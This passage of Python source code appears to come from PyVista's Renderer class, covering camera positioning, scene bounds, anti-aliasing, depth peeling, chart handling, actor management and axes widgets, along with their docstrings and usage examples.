self._viewup\n\n @viewup.setter\n def viewup(self, value): # numpydoc ignore=GL08\n self._viewup = value\n\n\nclass Renderer(_vtk.vtkOpenGLRenderer):\n \"\"\"Renderer class.\"\"\"\n\n # map camera_position string to an attribute\n CAMERA_STR_ATTR_MAP = {\n 'xy': 'view_xy',\n 'xz': 'view_xz',\n 'yz': 'view_yz',\n 'yx': 'view_yx',\n 'zx': 'view_zx',\n 'zy': 'view_zy',\n 'iso': 'view_isometric',\n }\n\n def __init__(\n self, parent, border=True, border_color='w', border_width=2.0\n ): # numpydoc ignore=PR01,RT01\n \"\"\"Initialize the renderer.\"\"\"\n super().__init__()\n self._actors = {}\n self.parent = parent # weakref.proxy to the plotter from Renderers\n self._theme = parent.theme\n self.bounding_box_actor = None\n self.scale = [1.0, 1.0, 1.0]\n self.AutomaticLightCreationOff()\n self._labels = {} # tracks labeled actors\n self._legend = None\n self._floor = None\n self._floors = []\n self._floor_kwargs = []\n # this keeps track of lights added manually to prevent garbage collection\n self._lights = []\n self._camera = Camera(self)\n self.SetActiveCamera(self._camera)\n 
self._empty_str = None # used to track reference to a vtkStringArray\n self._shadow_pass = None\n self._render_passes = RenderPasses(self)\n self.cube_axes_actor = None\n\n # This is a private variable to keep track of how many colorbars exist\n # This allows us to keep adding colorbars without overlapping\n self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))\n self._scalar_bar_slot_lookup = {}\n self.__charts = None\n\n self._border_actor = None\n if border:\n self.add_border(border_color, border_width)\n\n self.set_color_cycler(self._theme.color_cycler)\n\n @property\n def camera_set(self) -> bool: # numpydoc ignore=RT01\n \"\"\"Get or set whether this camera has been configured.\"\"\"\n if self.camera is None: # pragma: no cover\n return False\n return self.camera.is_set\n\n @camera_set.setter\n def camera_set(self, is_set: bool): # numpydoc ignore=GL08\n self.camera.is_set = is_set\n\n def set_color_cycler(self, color_cycler):\n \"\"\"Set or reset this renderer's color cycler.\n\n This color cycler is iterated over by each sequential :class:`add_mesh() `\n call to set the default color of the dataset being plotted.\n\n When setting, the value must be either a list of color-like objects,\n or a cycler of color-like objects. If the value passed is a single\n string, it must be one of:\n\n * ``'default'`` - Use the default color cycler (matches matplotlib's default)\n * ``'matplotlib`` - Dynamically get matplotlib's current theme's color cycler.\n * ``'all'`` - Cycle through all of the available colors in ``pyvista.plotting.colors.hexcolors``\n\n Setting to ``None`` will disable the use of the color cycler on this\n renderer.\n\n Parameters\n ----------\n color_cycler : str | cycler.Cycler | sequence[ColorLike]\n The colors to cycle through.\n\n Examples\n --------\n Set the default color cycler to iterate through red, green, and blue.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.renderer.set_color_cycler(['red', 'green', 'blue'])\n >>> _ = pl.add_mesh(pv.Cone(center=(0, 0, 0))) # red\n >>> _ = pl.add_mesh(pv.Cube(center=(1, 0, 0))) # green\n >>> _ = pl.add_mesh(pv.Sphere(center=(1, 1, 0))) # blue\n >>> _ = pl.add_mesh(pv.Cylinder(center=(0, 1, 0))) # red again\n >>> pl.show()\n\n \"\"\"\n cycler = get_cycler(color_cycler)\n if cycler is not None:\n # Color cycler - call object to generate `cycle` instance\n self._color_cycle = cycler()\n else:\n self._color_cycle = None\n\n @property\n def next_color(self): # numpydoc ignore=RT01\n \"\"\"Return next color from this renderer's color cycler.\"\"\"\n if self._color_cycle is None:\n return self._theme.color\n return next(self._color_cycle)['color']\n\n @property\n def _charts(self):\n \"\"\"Return the charts collection.\"\"\"\n # lazy instantiation here to avoid creating the charts object unless needed.\n if self.__charts is None:\n self.__charts = Charts(self)\n self.AddObserver(\"StartEvent\", partial(try_callback, self._before_render_event))\n return self.__charts\n\n @property\n def camera_position(self): # numpydoc ignore=RT01\n \"\"\"Return or set the camera position of active render window.\n\n Returns\n -------\n pyvista.CameraPosition\n Camera position.\n\n \"\"\"\n return CameraPosition(\n scale_point(self.camera, self.camera.position, invert=True),\n scale_point(self.camera, self.camera.focal_point, invert=True),\n self.camera.up,\n )\n\n @camera_position.setter\n def camera_position(self, camera_location): # numpydoc ignore=GL08\n if camera_location is None:\n return\n elif isinstance(camera_location, str):\n 
camera_location = camera_location.lower()\n            if camera_location not in self.CAMERA_STR_ATTR_MAP:\n                raise InvalidCameraError(\n                    'Invalid view direction. '\n                    'Use one of the following:\\n '\n                    f'{\", \".join(self.CAMERA_STR_ATTR_MAP)}'\n                )\n\n            getattr(self, self.CAMERA_STR_ATTR_MAP[camera_location])()\n\n        elif isinstance(camera_location[0], (int, float)):\n            if len(camera_location) != 3:\n                raise InvalidCameraError\n            self.view_vector(camera_location)\n        else:\n            # check if a valid camera position\n            if not isinstance(camera_location, CameraPosition):\n                if not len(camera_location) == 3:\n                    raise InvalidCameraError\n                elif any([len(item) != 3 for item in camera_location]):\n                    raise InvalidCameraError\n\n            # everything is set explicitly\n            self.camera.position = scale_point(self.camera, camera_location[0], invert=False)\n            self.camera.focal_point = scale_point(self.camera, camera_location[1], invert=False)\n            self.camera.up = camera_location[2]\n\n        # reset clipping range\n        self.reset_camera_clipping_range()\n        self.camera_set = True\n        self.Modified()\n\n    def reset_camera_clipping_range(self):\n        \"\"\"Reset the camera clipping range based on the bounds of the visible actors.\n\n        This ensures that no props are cut off\n        \"\"\"\n        self.ResetCameraClippingRange()\n\n    @property\n    def camera(self):  # numpydoc ignore=RT01\n        \"\"\"Return the active camera for the rendering scene.\"\"\"\n        return self._camera\n\n    @camera.setter\n    def camera(self, source):  # numpydoc ignore=GL08\n        self._camera = source\n        self.SetActiveCamera(self._camera)\n        self.camera_position = CameraPosition(\n            scale_point(source, source.position, invert=True),\n            scale_point(source, source.focal_point, invert=True),\n            source.up,\n        )\n        self.Modified()\n        self.camera_set = True\n\n    @property\n    def bounds(self) -> BoundsLike:  # numpydoc ignore=RT01\n        \"\"\"Return the bounds of all actors present in the rendering window.\"\"\"\n        the_bounds = np.array([np.inf, -np.inf, np.inf, -np.inf, np.inf, -np.inf])\n\n        def _update_bounds(bounds):\n            def update_axis(ax):\n                if bounds[ax * 2] < the_bounds[ax * 2]:\n                    the_bounds[ax * 2] = bounds[ax * 2]\n                if bounds[ax * 2 + 1] > the_bounds[ax * 2 + 1]:\n                    the_bounds[ax * 2 + 1] = bounds[ax * 2 + 1]\n\n            for ax in range(3):\n                update_axis(ax)\n            return\n\n        for actor in self._actors.values():\n            if isinstance(actor, (_vtk.vtkCubeAxesActor, _vtk.vtkLightActor)):\n                continue\n            if (\n                hasattr(actor, 'GetBounds')\n                and actor.GetBounds() is not None\n                and id(actor) != id(self.bounding_box_actor)\n            ):\n                _update_bounds(actor.GetBounds())\n\n        if np.any(np.abs(the_bounds)):\n            the_bounds[the_bounds == np.inf] = -1.0\n            the_bounds[the_bounds == -np.inf] = 1.0\n\n        return cast(BoundsLike, tuple(the_bounds))\n\n    @property\n    def length(self):  # numpydoc ignore=RT01\n        \"\"\"Return the length of the diagonal of the bounding box of the scene.\n\n        Returns\n        -------\n        float\n            Length of the diagonal of the bounding box.\n        \"\"\"\n        return pyvista.Box(self.bounds).length\n\n    @property\n    def center(self):  # numpydoc ignore=RT01\n        \"\"\"Return the center of the bounding box around all data present in the scene.\n\n        Returns\n        -------\n        list\n            Cartesian coordinates of the center.\n\n        \"\"\"\n        bounds = self.bounds\n        x = (bounds[1] + bounds[0]) / 2\n        y = (bounds[3] + bounds[2]) / 2\n        z = (bounds[5] + bounds[4]) / 2\n        return [x, y, z]\n\n    @property\n    def background_color(self):  # numpydoc ignore=RT01\n        \"\"\"Return the background color of this renderer.\"\"\"\n        return Color(self.GetBackground())\n\n    @background_color.setter\n    def background_color(self, color):  # 
numpydoc ignore=GL08\n self.set_background(color)\n self.Modified()\n\n def _before_render_event(self, *args, **kwargs):\n \"\"\"Notify all charts about render event.\"\"\"\n for chart in self._charts:\n chart._render_event(*args, **kwargs)\n\n def enable_depth_peeling(self, number_of_peels=None, occlusion_ratio=None):\n \"\"\"Enable depth peeling to improve rendering of translucent geometry.\n\n Parameters\n ----------\n number_of_peels : int, optional\n The maximum number of peeling layers. Initial value is 4\n and is set in the ``pyvista.global_theme``. A special value of\n 0 means no maximum limit. It has to be a positive value.\n\n occlusion_ratio : float, optional\n The threshold under which the depth peeling algorithm\n stops to iterate over peel layers. This is the ratio of\n the number of pixels that have been touched by the last\n layer over the total number of pixels of the viewport\n area. Initial value is 0.0, meaning rendering has to be\n exact. Greater values may speed up the rendering with\n small impact on the quality.\n\n Returns\n -------\n bool\n If depth peeling is supported.\n\n \"\"\"\n if number_of_peels is None:\n number_of_peels = self._theme.depth_peeling.number_of_peels\n if occlusion_ratio is None:\n occlusion_ratio = self._theme.depth_peeling.occlusion_ratio\n depth_peeling_supported = check_depth_peeling(number_of_peels, occlusion_ratio)\n if depth_peeling_supported:\n self.SetUseDepthPeeling(True)\n self.SetMaximumNumberOfPeels(number_of_peels)\n self.SetOcclusionRatio(occlusion_ratio)\n self.Modified()\n return depth_peeling_supported\n\n def disable_depth_peeling(self):\n \"\"\"Disable depth peeling.\"\"\"\n self.SetUseDepthPeeling(False)\n self.Modified()\n\n def enable_anti_aliasing(self, aa_type='ssaa'):\n \"\"\"Enable anti-aliasing.\n\n Parameters\n ----------\n aa_type : str, default: 'ssaa'\n Anti-aliasing type. Either ``\"fxaa\"`` or ``\"ssaa\"``.\n\n \"\"\"\n if not isinstance(aa_type, str):\n raise TypeError(f'`aa_type` must be a string, not {type(aa_type)}')\n aa_type = aa_type.lower()\n\n if aa_type == 'fxaa':\n if uses_egl(): # pragma: no cover\n # only display the warning when not building documentation\n if not pyvista.BUILDING_GALLERY:\n warnings.warn(\n \"VTK compiled with OSMesa/EGL does not properly support \"\n \"FXAA anti-aliasing and SSAA will be used instead.\"\n )\n self._render_passes.enable_ssaa_pass()\n return\n self._enable_fxaa()\n\n elif aa_type == 'ssaa':\n self._render_passes.enable_ssaa_pass()\n\n else:\n raise ValueError(f'Invalid `aa_type` \"{aa_type}\". 
Should be either \"fxaa\" or \"ssaa\"')\n\n def disable_anti_aliasing(self):\n \"\"\"Disable all anti-aliasing.\"\"\"\n self._render_passes.disable_ssaa_pass()\n self.SetUseFXAA(False)\n self.Modified()\n\n def _enable_fxaa(self):\n \"\"\"Enable FXAA anti-aliasing.\"\"\"\n self.SetUseFXAA(True)\n self.Modified()\n\n def _disable_fxaa(self):\n \"\"\"Disable FXAA anti-aliasing.\"\"\"\n self.SetUseFXAA(False)\n self.Modified()\n\n def add_border(self, color='white', width=2.0):\n \"\"\"Add borders around the frame.\n\n Parameters\n ----------\n color : ColorLike, default: \"white\"\n Color of the border.\n\n width : float, default: 2.0\n Width of the border.\n\n Returns\n -------\n vtk.vtkActor2D\n Border actor.\n\n \"\"\"\n points = np.array([[1.0, 1.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 0.0], [1.0, 0.0, 0.0]])\n\n lines = np.array([[2, 0, 1], [2, 1, 2], [2, 2, 3], [2, 3, 0]]).ravel()\n\n poly = pyvista.PolyData()\n poly.points = points\n poly.lines = lines\n\n coordinate = _vtk.vtkCoordinate()\n coordinate.SetCoordinateSystemToNormalizedViewport()\n\n mapper = _vtk.vtkPolyDataMapper2D()\n mapper.SetInputData(poly)\n mapper.SetTransformCoordinate(coordinate)\n\n actor = _vtk.vtkActor2D()\n actor.SetMapper(mapper)\n actor.GetProperty().SetColor(Color(color).float_rgb)\n actor.GetProperty().SetLineWidth(width)\n\n self.AddViewProp(actor)\n self.Modified()\n\n self._border_actor = actor\n return actor\n\n @property\n def has_border(self): # numpydoc ignore=RT01\n \"\"\"Return if the renderer has a border.\"\"\"\n return self._border_actor is not None\n\n @property\n def border_width(self): # numpydoc ignore=RT01\n \"\"\"Return the border width.\"\"\"\n if self.has_border:\n return self._border_actor.GetProperty().GetLineWidth()\n return 0\n\n @property\n def border_color(self): # numpydoc ignore=RT01\n \"\"\"Return the border color.\"\"\"\n if self.has_border:\n return Color(self._border_actor.GetProperty().GetColor())\n return None\n\n def add_chart(self, chart, *charts):\n \"\"\"Add a chart to this renderer.\n\n Parameters\n ----------\n chart : Chart\n Chart to add to renderer.\n\n *charts : Chart\n Charts to add to renderer.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> chart = pv.Chart2D()\n >>> _ = chart.plot(range(10), range(10))\n >>> pl = pv.Plotter()\n >>> pl.add_chart(chart)\n >>> pl.show()\n\n \"\"\"\n if _vtk.vtkRenderingContextOpenGL2 is None: # pragma: no cover\n from pyvista.core.errors import VTKVersionError\n\n raise VTKVersionError(\n \"VTK is missing vtkRenderingContextOpenGL2. 
Try installing VTK v9.1.0 or newer.\"\n )\n self._charts.add_chart(chart, *charts)\n\n @property\n def has_charts(self): # numpydoc ignore=RT01\n \"\"\"Return whether this renderer has charts.\"\"\"\n return self.__charts is not None\n\n @wraps(Charts.set_interaction)\n def set_chart_interaction(self, interactive, toggle=False): # numpydoc ignore=PR01,RT01\n \"\"\"Wrap ``Charts.set_interaction``.\"\"\"\n # Make sure we don't create the __charts object if this renderer has no charts yet.\n return self._charts.set_interaction(interactive, toggle) if self.has_charts else []\n\n @wraps(Charts.get_charts_by_pos)\n def _get_charts_by_pos(self, pos):\n \"\"\"Wrap ``Charts.get_charts_by_pos``.\"\"\"\n # Make sure we don't create the __charts object if this renderer has no charts yet.\n return self._charts.get_charts_by_pos(pos) if self.has_charts else []\n\n def remove_chart(self, chart_or_index):\n \"\"\"Remove a chart from this renderer.\n\n Parameters\n ----------\n chart_or_index : Chart or int\n Either the chart to remove from this renderer or its index in the collection of charts.\n\n Examples\n --------\n First define a function to add two charts to a renderer.\n\n >>> import pyvista as pv\n >>> def plotter_with_charts():\n ... pl = pv.Plotter()\n ... pl.background_color = 'w'\n ... chart_left = pv.Chart2D(size=(0.5, 1))\n ... _ = chart_left.line([0, 1, 2], [2, 1, 3])\n ... pl.add_chart(chart_left)\n ... chart_right = pv.Chart2D(size=(0.5, 1), loc=(0.5, 0))\n ... _ = chart_right.line([0, 1, 2], [3, 1, 2])\n ... pl.add_chart(chart_right)\n ... return pl, chart_left, chart_right\n ...\n >>> pl, *_ = plotter_with_charts()\n >>> pl.show()\n\n Now reconstruct the same plotter but remove the right chart by index.\n\n >>> pl, *_ = plotter_with_charts()\n >>> pl.remove_chart(1)\n >>> pl.show()\n\n Finally, remove the left chart by reference.\n\n >>> pl, chart_left, chart_right = plotter_with_charts()\n >>> pl.remove_chart(chart_left)\n >>> pl.show()\n\n \"\"\"\n # Make sure we don't create the __charts object if this renderer has no charts yet.\n if self.has_charts:\n self._charts.remove_chart(chart_or_index)\n\n @property\n def actors(self): # numpydoc ignore=RT01\n \"\"\"Return a dictionary of actors assigned to this renderer.\"\"\"\n return self._actors\n\n def add_actor(\n self,\n actor,\n reset_camera=False,\n name=None,\n culling=False,\n pickable=True,\n render=True,\n remove_existing_actor=True,\n ):\n \"\"\"Add an actor to render window.\n\n Creates an actor if input is a mapper.\n\n Parameters\n ----------\n actor : vtk.vtkActor | vtk.vtkMapper | pyvista.Actor\n The actor to be added. Can be either ``vtkActor`` or ``vtkMapper``.\n\n reset_camera : bool, default: False\n Resets the camera when ``True``.\n\n name : str, optional\n Name to assign to the actor. Defaults to the memory address.\n\n culling : str, default: False\n Does not render faces that are culled. Options are\n ``'front'`` or ``'back'``. 
This can be helpful for dense\n surface meshes, especially when edges are visible, but can\n cause flat meshes to be partially displayed.\n\n pickable : bool, default: True\n Whether to allow this actor to be pickable within the\n render window.\n\n render : bool, default: True\n If the render window is being shown, trigger a render\n after adding the actor.\n\n remove_existing_actor : bool, default: True\n Removes any existing actor if the named actor ``name`` is already\n present.\n\n Returns\n -------\n actor : vtk.vtkActor or pyvista.Actor\n The actor.\n\n actor_properties : vtk.Properties\n Actor properties.\n \"\"\"\n # Remove actor by that name if present\n rv = None\n if name and remove_existing_actor:\n rv = self.remove_actor(name, reset_camera=False, render=False)\n\n if isinstance(actor, _vtk.vtkMapper):\n actor = Actor(mapper=actor, name=name)\n\n if isinstance(actor, Actor) and name:\n # WARNING: this will override the name if already set on Actor\n actor.name = name\n\n if name is None:\n if isinstance(actor, Actor):\n name = actor.name\n else:\n # Fallback for non-wrapped actors\n # e.g., vtkScalarBarActor\n name = actor.GetAddressAsString(\"\")\n\n actor.SetPickable(pickable)\n # Apply this renderer's scale to the actor (which can be further scaled)\n if hasattr(actor, 'SetScale'):\n actor.SetScale(np.array(actor.GetScale()) * np.array(self.scale))\n self.AddActor(actor) # must add actor before resetting camera\n self._actors[name] = actor\n\n if reset_camera:\n self.reset_camera(render)\n elif not self.camera_set and reset_camera is None and not rv:\n self.reset_camera(render)\n elif render:\n self.parent.render()\n\n self.update_bounds_axes()\n\n if isinstance(culling, str):\n culling = culling.lower()\n\n if culling:\n if culling in [True, 'back', 'backface', 'b']:\n try:\n actor.GetProperty().BackfaceCullingOn()\n except AttributeError: # pragma: no cover\n pass\n elif culling in ['front', 'frontface', 'f']:\n try:\n actor.GetProperty().FrontfaceCullingOn()\n except AttributeError: # pragma: no cover\n pass\n else:\n raise ValueError(f'Culling option ({culling}) not understood.')\n\n self.Modified()\n\n prop = None\n if hasattr(actor, 'GetProperty'):\n prop = actor.GetProperty()\n\n return actor, prop\n\n def add_axes_at_origin(\n self,\n x_color=None,\n y_color=None,\n z_color=None,\n xlabel='X',\n ylabel='Y',\n zlabel='Z',\n line_width=2,\n labels_off=False,\n ):\n \"\"\"Add axes actor at origin.\n\n Parameters\n ----------\n x_color : ColorLike, optional\n The color of the x axes arrow.\n\n y_color : ColorLike, optional\n The color of the y axes arrow.\n\n z_color : ColorLike, optional\n The color of the z axes arrow.\n\n xlabel : str, default: \"X\"\n The label of the x axes arrow.\n\n ylabel : str, default: \"Y\"\n The label of the y axes arrow.\n\n zlabel : str, default: \"Z\"\n The label of the z axes arrow.\n\n line_width : int, default: 2\n Width of the arrows.\n\n labels_off : bool, default: False\n Disables the label text when ``True``.\n\n Returns\n -------\n vtk.vtkAxesActor\n Actor of the axes.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(pv.Sphere(center=(2, 0, 0)), color='r')\n >>> _ = pl.add_mesh(pv.Sphere(center=(0, 2, 0)), color='g')\n >>> _ = pl.add_mesh(pv.Sphere(center=(0, 0, 2)), color='b')\n >>> _ = pl.add_axes_at_origin()\n >>> pl.show()\n\n \"\"\"\n self._marker_actor = create_axes_marker(\n line_width=line_width,\n x_color=x_color,\n y_color=y_color,\n z_color=z_color,\n xlabel=xlabel,\n 
ylabel=ylabel,\n            zlabel=zlabel,\n            labels_off=labels_off,\n        )\n        self.AddActor(self._marker_actor)\n        memory_address = self._marker_actor.GetAddressAsString(\"\")\n        self._actors[memory_address] = self._marker_actor\n        self.Modified()\n        return self._marker_actor\n\n    def add_orientation_widget(\n        self, actor, interactive=None, color=None, opacity=1.0, viewport=None\n    ):\n        \"\"\"Use the given actor in an orientation marker widget.\n\n        Color and opacity are only valid arguments if a mesh is passed.\n\n        Parameters\n        ----------\n        actor : vtk.vtkActor | pyvista.DataSet\n            The mesh or actor to use as the marker.\n\n        interactive : bool, optional\n            Control if the orientation widget is interactive. By\n            default uses the value from\n            :attr:`pyvista.global_theme.interactive`.\n\n        color : ColorLike, optional\n            The color of the actor. This only applies if ``actor`` is\n            a :class:`pyvista.DataSet`.\n\n        opacity : int | float, default: 1.0\n            Opacity of the marker.\n\n        viewport : sequence[float], optional\n            Viewport ``(xstart, ystart, xend, yend)`` of the widget.\n\n        Returns\n        -------\n        vtk.vtkOrientationMarkerWidget\n            Orientation marker widget.\n\n        Examples\n        --------\n        Use an Arrow as the orientation widget.\n\n        >>> import pyvista as pv\n        >>> pl = pv.Plotter()\n        >>> actor = pl.add_mesh(pv.Cube(), show_edges=True)\n        >>> actor = pl.add_orientation_widget(pv.Arrow(), color='r')\n        >>> pl.show()\n\n        \"\"\"\n        if isinstance(actor, pyvista.DataSet):\n            mapper = _vtk.vtkDataSetMapper()\n            mesh = actor.copy()\n            mesh.clear_data()\n            mapper.SetInputData(mesh)\n            actor = pyvista.Actor(mapper=mapper)\n            if color is not None:\n                actor.prop.color = color\n            actor.prop.opacity = opacity\n        if hasattr(self, 'axes_widget'):\n            # Delete the old one\n            self.axes_widget.EnabledOff()\n            self.Modified()\n            del self.axes_widget\n        if interactive is None:\n            interactive = self._theme.interactive\n        self.axes_widget = _vtk.vtkOrientationMarkerWidget()\n        self.axes_widget.SetOrientationMarker(actor)\n        if hasattr(self.parent, 'iren'):\n            self.axes_widget.SetInteractor(self.parent.iren.interactor)\n            self.axes_widget.SetEnabled(1)\n            self.axes_widget.SetInteractive(interactive)\n        self.axes_widget.SetCurrentRenderer(self)\n        if viewport is not None:\n            self.axes_widget.SetViewport(viewport)\n        self.Modified()\n        return self.axes_widget\n\n    def add_axes(\n        self,\n        interactive=None,\n        line_width=2,\n        color=None,\n        x_color=None,\n        y_color=None,\n        z_color=None,\n        xlabel='X',\n        ylabel='Y',\n        zlabel='Z',\n        labels_off=False,\n        box=None,\n        box_args=None,\n        viewport=(0, 0, 0.2, 0.2),\n        **kwargs,\n    ):\n        \"\"\"Add an interactive axes widget in the bottom left corner.\n\n        Parameters\n        ----------\n        interactive : bool, optional\n            Enable this orientation widget to be moved by the user.\n\n        line_width : int, default: 2\n            The width of the marker lines.\n\n        color : ColorLike, optional\n            Color of the labels.\n\n        x_color : ColorLike, optional\n            Color used for the x axis arrow. Defaults to theme axes parameters.\n\n        y_color : ColorLike, optional\n            Color used for the y axis arrow. Defaults to theme axes parameters.\n\n        z_color : ColorLike, optional\n            Color used for the z axis arrow. Defaults to theme axes parameters.\n\n        xlabel : str, default: \"X\"\n            Text used for the x axis.\n\n        ylabel : str, default: \"Y\"\n            Text used for the y axis.\n\n        zlabel : str, default: \"Z\"\n            Text used for the z axis.\n\n        labels_off : bool, default: False\n            Enable or disable the text labels for the axes.\n\n        box : bool, optional\n            Show a box orientation marker. 
Use ``box_args`` to adjust.\n See :func:`pyvista.create_axes_orientation_box` for details.\n\n box_args : dict, optional\n Parameters for the orientation box widget when\n ``box=True``. See the parameters of\n :func:`pyvista.create_axes_orientation_box`.\n\n viewport : sequence[float], default: (0, 0, 0.2, 0.2)\n Viewport ``(xstart, ystart, xend, yend)`` of the widget.\n\n **kwargs : dict, optional\n Used for passing parameters for the orientation marker\n widget. See the parameters of :func:`pyvista.create_axes_marker`.\n\n Returns\n -------\n vtk.vtkAxesActor\n Axes actor.\n\n Examples\n --------\n Show axes without labels and with thick lines.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> actor = pl.add_mesh(pv.Box(), show_edges=True)\n >>> _ = pl.add_axes(line_width=5, labels_off=True)\n >>> pl.show()\n\n Use the axes orientation widget instead of the default arrows.\n\n >>> pl = pv.Plotter()\n >>> actor = pl.add_mesh(pv.Sphere())\n >>> _ = pl.add_axes(box=True)\n >>> pl.show()\n\n Specify more parameters for the axes marker.\n\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> actor = pl.add_mesh(pv.Box(), show_edges=True)\n >>> _ = pl.add_axes(\n ... line_width=5,\n ... cone_radius=0.6,\n ... shaft_length=0.7,\n ... tip_length=0.3,\n ... ambient=0.5,\n ... label_size=(0.4, 0.16),\n ... )\n >>> pl.show()\n\n \"\"\"\n if interactive is None:\n interactive = self._theme.interactive\n if hasattr(self, 'axes_widget'):\n self.axes_widget.EnabledOff()\n self.Modified()\n del self.axes_widget\n if box is None:\n box = self._theme.axes.box\n if box:\n if box_args is None:\n box_args = {}\n self.axes_actor = create_axes_orientation_box(\n label_color=color,\n line_width=line_width,\n x_color=x_color,\n y_color=y_color,\n z_color=z_color,\n xlabel=xlabel,\n ylabel=ylabel,\n zlabel=zlabel,\n labels_off=labels_off,\n **box_args,\n )\n else:\n self.axes_actor = create_axes_marker(\n label_color=color,\n line_width=line_width,\n x_color=x_color,\n y_color=y_color,\n z_color=z_color,\n xlabel=xlabel,\n ylabel=ylabel,\n zlabel=zlabel,\n labels_off=labels_off,\n **kwargs,\n )\n axes_widget = self.add_orientation_widget(\n self.axes_actor, interactive=interactive, color=None\n )\n axes_widget.SetViewport(viewport)\n return self.axes_actor\n\n def hide_axes(self):\n \"\"\"Hide the axes orientation widget.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.hide_axes()\n\n \"\"\"\n if hasattr(self, 'axes_widget') and self.axes_widget.GetEnabled():\n self.axes_widget.EnabledOff()\n self.Modified()\n\n def show_axes(self):\n \"\"\"Show the axes orientation widget.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.show_axes()\n\n \"\"\"\n if hasattr(self, 'axes_widget'):\n self.axes_widget.EnabledOn()\n self.axes_widget.SetCurrentRenderer(self)\n else:\n self.add_axes()\n self.Modified()\n\n @property\n def axes_enabled(self): # numpydoc ignore=RT01\n \"\"\"Return ``True`` when axes are enabled.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> pl = pv.Plotter()\n >>> pl.hide_axes()\n >>> pl.renderer.axes_enabled\n False\n\n \"\"\"\n if hasattr(self, 'axes_widget'):\n return bool(self.axes_widget.GetEnabled())\n return False\n\n def show_bounds(\n self,\n mesh=None,\n bounds=None,\n axes_ranges=None,\n show_xaxis=True,\n show_yaxis=True,\n show_zaxis=True,\n show_xlabels=True,\n show_ylabels=True,\n show_zlabels=True,\n bold=True,\n font_size=None,\n font_family=None,\n color=None,\n xtitle='X Axis',\n ytitle='Y 
Axis',\n        ztitle='Z Axis',\n        n_xlabels=5,\n        n_ylabels=5,\n        n_zlabels=5,\n        use_2d=False,\n        grid=None,\n        location='closest',\n        ticks=None,\n        all_edges=False,\n        corner_factor=0.5,\n        fmt=None,\n        minor_ticks=False,\n        padding=0.0,\n        use_3d_text=True,\n        render=None,\n        **kwargs,\n    ):\n        \"\"\"Add bounds axes.\n\n        Shows the bounds of the most recent input mesh unless mesh is\n        specified.\n\n        Parameters\n        ----------\n        mesh : pyvista.DataSet | pyvista.MultiBlock, optional\n            Input mesh to draw bounds axes around.\n\n        bounds : sequence[float], optional\n            Bounds to override mesh bounds in the form ``[xmin, xmax,\n            ymin, ymax, zmin, zmax]``.\n\n        axes_ranges : sequence[float], optional\n            When set, these values override the values that are shown on the\n            axes. This can be useful when plotting scaled datasets or if you wish\n            to manually display different values. These values must be in the\n            form:\n\n            ``[xmin, xmax, ymin, ymax, zmin, zmax]``.\n\n        show_xaxis : bool, default: True\n            Makes X axis visible.\n\n        show_yaxis : bool, default: True\n            Makes Y axis visible.\n\n        show_zaxis : bool, default: True\n            Makes Z axis visible.\n\n        show_xlabels : bool, default: True\n            Shows X labels.\n\n        show_ylabels : bool, default: True\n            Shows Y labels.\n\n        show_zlabels : bool, default: True\n            Shows Z labels.\n\n        bold : bool, default: True\n            Bolds axis labels and numbers.\n\n        font_size : float, optional\n            Sets the size of the label font. Defaults to\n            :attr:`pyvista.global_theme.font.size`.\n\n        font_family : str, optional\n            Font family. Must be either ``'courier'``, ``'times'``,\n            or ``'arial'``. Defaults to\n            :attr:`pyvista.global_theme.font.family`.\n\n        color : ColorLike, optional\n            Color of all labels and axis titles. Defaults to\n            :attr:`pyvista.global_theme.font.color`.\n\n            Either a string, RGB list, or hex color string. For\n            example:\n\n            * ``color='white'``\n            * ``color='w'``\n            * ``color=[1.0, 1.0, 1.0]``\n            * ``color='#FFFFFF'``\n\n        xtitle : str, default: \"X Axis\"\n            Title of the X axis.\n\n        ytitle : str, default: \"Y Axis\"\n            Title of the Y axis.\n\n        ztitle : str, default: \"Z Axis\"\n            Title of the Z axis.\n\n        n_xlabels : int, default: 5\n            Number of labels for the X axis.\n\n        n_ylabels : int, default: 5\n            Number of labels for the Y axis.\n\n        n_zlabels : int, default: 5\n            Number of labels for the Z axis.\n\n        use_2d : bool, default: False\n            This can be enabled for smoother plotting.\n\n        grid : bool or str, optional\n            Add grid lines to the backface (``True``, ``'back'``, or\n            ``'backface'``) or to the frontface (``'front'``,\n            ``'frontface'``) of the axes actor.\n\n        location : str, default: \"closest\"\n            Set how the axes are drawn: either static (``'all'``), closest\n            triad (``'front'``, ``'closest'``, ``'default'``), furthest triad\n            (``'back'``, ``'furthest'``), static closest to the origin\n            (``'origin'``), or outer edges (``'outer'``) in relation to the\n            camera position.\n\n        ticks : str, optional\n            Set how the ticks are drawn on the axes grid. Options include:\n            ``'inside', 'outside', 'both'``.\n\n        all_edges : bool, default: False\n            Adds an unlabeled and unticked box at the boundaries of\n            plot. Useful for when wanting to plot outer grids while\n            still retaining all edges of the boundary.\n\n        corner_factor : float, default: 0.5\n            If ``all_edges``, this is the factor along each axis to\n            draw the default box. Default shows the full box.\n\n        fmt : str, optional\n            A format string defining how tick labels are generated from\n            tick positions. 
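The string uses ``printf``-style formatting; for example, ``fmt='%.2f'`` renders each tick with two decimal places, while ``fmt='%d'`` renders integers. 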
